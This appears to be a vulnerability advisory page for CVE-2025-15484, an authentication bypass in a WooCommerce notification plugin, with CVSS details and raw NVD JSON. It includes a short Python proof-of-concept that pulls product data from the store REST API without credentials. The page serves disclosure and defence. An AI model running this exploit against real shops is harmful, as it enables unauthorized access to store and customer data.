Security Vulnerability Report
中文
CVE-2025-15484 CVSS 9.1 CRITICAL

CVE-2025-15484

Published: 2026-04-01 06:16:14
Last Modified: 2026-04-15 15:05:48

Description

The Order Notification for WooCommerce WordPress plugin before 3.6.3 overrides WooCommerce's permission checks to grant full access to all unauthenticated requests, enabling complete read/write access to store resources like products, coupons, and customers.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Order Notification for WooCommerce < 3.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://example.com" # The vulnerability allows unauthenticated access to WooCommerce resources. # This script attempts to read product data via the REST API without credentials. # Endpoint to retrieve products (usually requires authentication) api_endpoint = f"{target_url}/wp-json/wc/v3/products" try: # Send GET request without any authentication headers response = requests.get(api_endpoint, timeout=10) if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print("[+] Retrieved Product Data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print("[-] The target might be patched or not vulnerable.") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15484", "sourceIdentifier": "[email protected]", "published": "2026-04-01T06:16:14.133", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Order Notification for WooCommerce WordPress plugin before 3.6.3 overrides WooCommerce's permission checks to grant full access to all unauthenticated requests, enabling complete read/write access to store resources like products, coupons, and customers."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://wpscan.com/vulnerability/ee9f1c0c-86bb-4922-9eb5-8aae78003eff/", "source": "[email protected]"}]}}